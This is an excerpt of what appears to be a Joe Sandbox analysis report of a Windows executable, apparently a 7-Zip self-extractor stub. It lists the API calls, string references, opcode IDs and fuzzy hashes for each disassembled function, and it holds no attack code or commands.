                                                                    • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                    • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                    • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                    • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                    • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                    APIs
                                                                      • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID:
                                                                    • API String ID: 3498533004-0
                                                                    • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                    • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                    • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: _beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3014514943-0
                                                                    • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                    • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                    • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                    • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                    • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                    • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                    • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                    APIs
                                                                    • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime
                                                                    • String ID:
                                                                    • API String ID: 1425588814-0
                                                                    • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                    • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                    • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                    • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                    • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                    • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                    • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                                    • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                                    • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                                    • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                                    • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                                    • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                    • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                                    APIs
                                                                    • _wtol.MSVCRT ref: 00403882
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                    • _wtol.MSVCRT ref: 00403A1C
                                                                    • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                    • String ID: .lnk
                                                                    • API String ID: 408529070-24824748
                                                                    • Opcode ID: 9d40265efa088536896acfae4ca69e27bed61809b258dc233c1d8c18e094151d
                                                                    • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                    • Opcode Fuzzy Hash: 9d40265efa088536896acfae4ca69e27bed61809b258dc233c1d8c18e094151d
                                                                    • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                    • wsprintfW.USER32 ref: 004021E7
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                    • GetLastError.KERNEL32 ref: 00402201
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                    • GetLastError.KERNEL32 ref: 00402236
                                                                    • lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
                                                                    • ??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
                                                                    • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                    • SetLastError.KERNEL32(?), ref: 00402282
                                                                    • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                    • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                    • _wtol.MSVCRT ref: 00402314
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,025649B0,00000002), ref: 00402334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                    • String ID: 7zSfxString%d
                                                                    • API String ID: 2117570002-3906403175
                                                                    • Opcode ID: 1b199f56c2d2ce4f93a07a59f4a80a87b2c3be1da1ba760d7f1a60cb3315d551
                                                                    • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                    • Opcode Fuzzy Hash: 1b199f56c2d2ce4f93a07a59f4a80a87b2c3be1da1ba760d7f1a60cb3315d551
                                                                    • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                    • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                    • wsprintfW.USER32 ref: 00401E7F
                                                                    • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                    • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                    • API String ID: 2639302590-365843014
                                                                    • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                    • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                    • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                    APIs
                                                                    • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                    • GetLastError.KERNEL32 ref: 00408DF4
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                    • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                    • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                    • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 829399097-0
                                                                    • Opcode ID: 59554f6d9bca7902a0271ca2f41497f45a9e4576255c66063583f637390c7374
                                                                    • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
